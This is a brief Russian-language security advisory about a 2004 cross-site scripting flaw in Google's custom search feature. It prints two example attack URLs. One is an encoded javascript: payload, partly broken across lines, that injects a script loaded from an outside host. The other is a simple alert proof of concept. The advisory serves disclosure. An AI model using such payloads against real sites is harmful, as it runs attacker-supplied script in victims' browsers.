Security Lab

Межсайтовое выполнение сценариев в custom web search feature

Дата публикации:21.10.2004
Дата изменения:17.10.2006
Всего просмотров:1011
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: custom web search feature

Описание:
Уязвимость обработки внешних данных обнаружена в Google в custom web search feature. Удаленный атакующий может выполнить произвольный HTML код в браузере жертвы.

Уязвимость существует в сценарии ‘custom’. Удаленный атакующий может создать специальным образом URL и выполнить XSS. Пример: http://[target]/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%6 9%
9%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

http://[target]/custom?cof=L:javascrip t:javascript:alert('EEK!')

URL производителя: www.google.com/

Решение: Решение не существует на данный момент

Ссылки: Google Input Validation Bug in Custom Search Feature Lets Remote Users Conduct Cross-Site Scripting Attacks